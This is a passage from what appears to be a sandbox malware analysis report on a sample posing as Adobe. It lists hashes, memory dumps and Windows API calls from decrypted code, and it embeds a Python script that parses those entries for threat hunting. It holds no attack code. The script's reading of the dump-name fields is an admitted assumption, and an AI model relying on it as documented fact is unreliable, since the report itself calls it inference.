                                                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                      • Instruction Fuzzy Hash: 82119075504280DFDB16CF14D5C4B15FF71FB49314F24C6AAD88A4B696C33AD84ACB62
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247467558.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a9d000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff2a25dbe43fbbf736415a301e0ae0a1b3239b556d9d301b845e378b960ae020
                                                      • Instruction ID: 4548156011a6797d0702fc8a08665dac64fcdaf6eb0c876c74105d68e4acaff5
                                                      • Opcode Fuzzy Hash: ff2a25dbe43fbbf736415a301e0ae0a1b3239b556d9d301b845e378b960ae020
                                                      • Instruction Fuzzy Hash: AF01DB712053449AEB209F95CD84B67BFECEF55324F18C52AED091F286D2799881CAB1
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2247467558.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a9d000_Adobe.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d64fc1af84ae6df5aaf9fa5236e96af5f1e3ef189464e6457b5334ee1530b74
                                                      • Instruction ID: bdae1bb88779d7f462bd5a905678d9c747135cb8e0f1b44294f3c89d6d75b576
                                                      • Opcode Fuzzy Hash: 6d64fc1af84ae6df5aaf9fa5236e96af5f1e3ef189464e6457b5334ee1530b74
                                                      • Instruction Fuzzy Hash: E7F062715053449AEB108F56C888B66FFE8EF95734F18C45AED485F286C2799884CBB1
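Every entry above carries the same fields for a dumped region: the .sdmp name with its base offset, the APIs resolved in the function, and the Opcode ID, Instruction ID and fuzzy hashes that make the function searchable across reports. The script below is an added example written for this page, not code from Joe Sandbox or from its report. It parses entries in that layout into records, groups resolved APIs by process and region, lists Opcode IDs that more than one entry shares (as the two AAD000 entries above do, with different Instruction IDs), and flags dumps whose protection field is 0x40 (PAGE_EXECUTE_READWRITE). The meaning assigned to the dotted .sdmp name fields (PID, base address, page protection) is an assumption inferred from the pairing of 0000000B...0000000000B90000... with hcaresult_11_2_b90000 in this report, not documented behaviour; the sample text is constructed input abridged from the process-11 entries. The API regex also accepts the argument-less form "Name.MODULE ref: ADDR" that the process-13 entries use, so it runs over the whole section.

```python
"""Turn Joe Sandbox 'Memory Dump Source' disassembly entries into hunt-able records."""
import re
from collections import defaultdict

# Constructed sample: four entries abridged from the process-11 section of this report
# (real hashes and dump names; bullet lines trimmed to the fields the parser reads).
SAMPLE = """\
control_flow_graph 467 b9590c-b9590e 473 b9598f-b959d9 CreateActCtxA 467->473
APIs
• CreateActCtxA.KERNEL32(?), ref: 00B959C9
Memory Dump Source
• Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
• Snapshot File: hcaresult_11_2_b90000_Adobe.jbxd
• Opcode ID: ce35d0c8ec9cf157c025b27c85ebe18a4292d296e88b5be279cc1e2b445287d0
• Instruction ID: cc5122a53a15faf048002e9de9e59d74d82c219a18aa0ff517c20021d10b3df0
• Instruction Fuzzy Hash: 044124B0C00719CBDF25DFAAC88478DBBF6BF48314F60806AD008AB251DB756A46CF90
control_flow_graph 521 b9d2fc-b9d7a4 DuplicateHandle 523 b9d7ad-b9d7ca 521->523
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B9D6D6,?,?,?,?,?), ref: 00B9D797
• Source File: 0000000B.00000002.2247990696.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
• Opcode ID: 8cf1beeb8b487e2b48893dc5950405654146132ce9323bfa6c3b9784b2dd863b
• Instruction ID: dca0b240ae59e7443a991b855a004e37c6a110a8e83620c0951fd9240db1e32c
• Instruction Fuzzy Hash: 7821E6B59002489FDB10DF9AD584AEEFBF5FB48310F14846AE918A3310D379A950CFA4
• Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
• Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction ID: 1669ae03e294c9a0102772b60490cfe9bf4ff772a1642416628f777289fa06d2
• Instruction Fuzzy Hash: 8511BB75504280DFCB02CF10C5C4B15BBA1FB85314F24C6A9D88A4B6A6C33AD80ACB62
• Source File: 0000000B.00000002.2247557884.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
• Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction ID: 8cdc3029a8251a129a43715088ee3c32600d6828d7247cdf3a00183ee10013ae
• Instruction Fuzzy Hash: 82119075504280DFDB16CF14D5C4B15FF71FB49314F24C6AAD88A4B696C33AD84ACB62
"""

# API lines read "• Name.MODULE(args), ref: ADDR" or, without arguments, "• Name.MODULE ref: ADDR".
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
CFG_RE = re.compile(r"^control_flow_graph\s+\d+\s+([0-9a-f]+)")
PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant


def decode_dump_name(name):
    """Split a .sdmp name on dots. ASSUMPTION inferred from this report (0000000B...B90000
    pairs with hcaresult_11_2_b90000): field 0 = PID (hex), field 3 = base, field 4 = protection."""
    f = name.split(".")
    return {"pid": int(f[0], 16), "base": int(f[3], 16), "protect": int(f[4], 16)}


def parse_entries(text):
    """One dict per entry; an entry is closed by its 'Instruction Fuzzy Hash' line."""
    entries, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if m := CFG_RE.match(line):
            cur["function"] = m.group(1)  # start address of the first basic block
            continue
        if m := API_RE.match(line):
            cur["apis"].append({"name": m.group(1), "module": m.group(2), "ref": m.group(4)})
            continue
        if not (m := FIELD_RE.match(line)):
            continue  # plain headers such as "APIs" or "Memory Dump Source"
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            cur["dump"] = value.split(",")[0]  # drop ", Offset: ..., based on PE: ..."
            cur.update(decode_dump_name(cur["dump"]))
        else:
            cur[key] = value
        if key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = {"apis": []}
    return entries


def apis_by_region(entries):
    """'pid:base' -> sorted names of the APIs resolved inside that dumped region."""
    out = defaultdict(set)
    for e in entries:
        for a in e["apis"]:
            out[f"{e['pid']}:{e['base']:08X}"].add(a["name"])
    return {k: sorted(v) for k, v in out.items()}


def shared_opcode_ids(entries):
    """Opcode IDs carried by more than one entry, with their (differing) Instruction IDs."""
    seen = defaultdict(list)
    for e in entries:
        seen[e.get("Opcode ID")].append(e.get("Instruction ID"))
    return {k: v for k, v in seen.items() if k and len(v) > 1}


def rwx_dumps(entries):
    """Distinct dump names whose protection field equals PAGE_EXECUTE_READWRITE."""
    return sorted({e["dump"] for e in entries if e.get("protect") == PAGE_EXECUTE_READWRITE})


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for region, names in apis_by_region(recs).items():
        print(region, ", ".join(names))
    for opc, ids in shared_opcode_ids(recs).items():
        print("shared Opcode ID", opc[:12], "instruction IDs", [i[:12] for i in ids])
    print("RWX dumps:", rwx_dumps(recs))
```

Feed it the whole disassembly section of a report and the region map shows which decrypted, writable-and-executable allocation resolves which APIs; the Instruction Fuzzy Hash values in the records are the ones to pivot on across other reports of the same family.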

                                                      Execution Graph

Execution Coverage: 8.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 33
Total number of Limit Nodes: 5

• Graph summary (rendered in the report): the API nodes are GetCurrentProcess (151d106), GetCurrentThread (151d158), GetCurrentProcess (151d195) and GetCurrentThreadId (151d1f3) in one chain starting at 151d0c0; DuplicateHandle (151d710); GetModuleHandleW (151b060), reached from 151ad30 via 151ae28; and CreateActCtxA (15144b0 and 1515918), reached from 1514668 via 1514779 and 151479d.

Control-flow Graph

• Graph summary (rendered in the report): 10 basic blocks, 151d0b1-151d28d; GetCurrentProcess is called from block 151d0b1-151d14f, GetCurrentThread from 151d158-151d18c, GetCurrentProcess again from 151d195-151d1c9, an internal function at 151d699 from 151d1d2-151d1ed, and GetCurrentThreadId from 151d1f3-151d222.
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0151D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0151D211
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 6bc1497117b8aa8f734a5f5f6efb55c6067461a7aeb4d3917f56cce9c7398868
                                                      • Instruction ID: b91d7427ee344256c2f97cc3de6b6aacaa77b57e0de5bbe164ee469d2a337dd0
                                                      • Opcode Fuzzy Hash: 6bc1497117b8aa8f734a5f5f6efb55c6067461a7aeb4d3917f56cce9c7398868
                                                      • Instruction Fuzzy Hash: E15156B09002098FEB08DFA9D548BAEBFF5FF48314F208459E119AB360D7389944CB65

Control-flow Graph

• Graph summary (rendered in the report): 10 basic blocks, 151d0c0-151d28d, the same body as the previous entry from a later start address; GetCurrentProcess is called from block 151d0c0-151d14f, GetCurrentThread from 151d158-151d18c, GetCurrentProcess again from 151d195-151d1c9, an internal function at 151d699 from 151d1d2-151d1ed, and GetCurrentThreadId from 151d1f3-151d222.
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D13E
                                                      • GetCurrentThread.KERNEL32 ref: 0151D17B
                                                      • GetCurrentProcess.KERNEL32 ref: 0151D1B8
                                                      • GetCurrentThreadId.KERNEL32 ref: 0151D211
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: 796975e8a4e72b5c752b0beeb27386147f1c366416d63845b233e529ed9dbeba
                                                      • Instruction ID: 0da78bace3ebde318e38826e393a85bb41a059ef962036146884d402afcffb15
                                                      • Opcode Fuzzy Hash: 796975e8a4e72b5c752b0beeb27386147f1c366416d63845b233e529ed9dbeba
                                                      • Instruction Fuzzy Hash: E95156B09002098FEB18DFA9D548BEEBFF5FF89314F208459E519AB360D7389844CB65

Control-flow Graph

• Graph summary (rendered in the report): basic blocks from 151ae28 through 151b0a8; internal calls to 151a14c, 151a158, 151a168, 151a178, 151a188 and to 151b0b0/151b0c0 (the block at 151ae4e takes either target); GetModuleHandleW is called from block 151b060-151b08b.
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0151B07E
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 66a7c0065968bc67c4acadca3a4647244409f4408aca7704fa5fc745fff528ba
                                                      • Instruction ID: fa9cbd1dceddbb9f6c37bdda9c99ab785099b311fcaf015424347ac5de140c75
                                                      • Opcode Fuzzy Hash: 66a7c0065968bc67c4acadca3a4647244409f4408aca7704fa5fc745fff528ba
                                                      • Instruction Fuzzy Hash: A07156B0A01B458FE726DF29D44075ABBF5FF88304F008A2DE49ADBA54D774E845CB90

Control-flow Graph

• Graph summary (rendered in the report): 9 basic blocks, 151590c-1515a61; CreateActCtxA is called from block 1515918-15159d9, and the final block 1515a61 loops on itself.
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 015159C9
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: c708dbe63afe925215fee8e48e5b6fe30a154a4b2cd93c9fc319806891eddc5e
                                                      • Instruction ID: 8f2acc0a5e7c177c3e9e7cf69a947f48d6c6e7a854cae3c49a0d508be7b3f0cb
                                                      • Opcode Fuzzy Hash: c708dbe63afe925215fee8e48e5b6fe30a154a4b2cd93c9fc319806891eddc5e
                                                      • Instruction Fuzzy Hash: 1A41E3B1C00719CBDB25DFA9C884B8DBBF5BF49304F20845AD408AB255DB756946CF91

Control-flow Graph

• Graph summary (rendered in the report): 8 basic blocks, 15144b0-1515a61; CreateActCtxA is called from the first block 15144b0-15159d9, and the final block 1515a61 loops on itself.
APIs
• CreateActCtxA.KERNEL32(?), ref: 015159C9
Memory Dump Source
• Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0

Control-flow Graph
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0151D797
Memory Dump Source
• Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0

Control-flow Graph
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0151D797
Memory Dump Source
• Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0

Control-flow Graph
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0151B07E
Memory Dump Source
• Source File: 0000000D.00000002.2328605420.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_1510000_Adobe.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Memory Dump Source
• Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.2328261729.00000000013BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_13bd000_Adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.2328166869.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_13ad000_Adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000D.00000002.2328166869.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_13ad000_Adobe.jbxd
Similarity
• API ID:
• String ID:
• API String ID: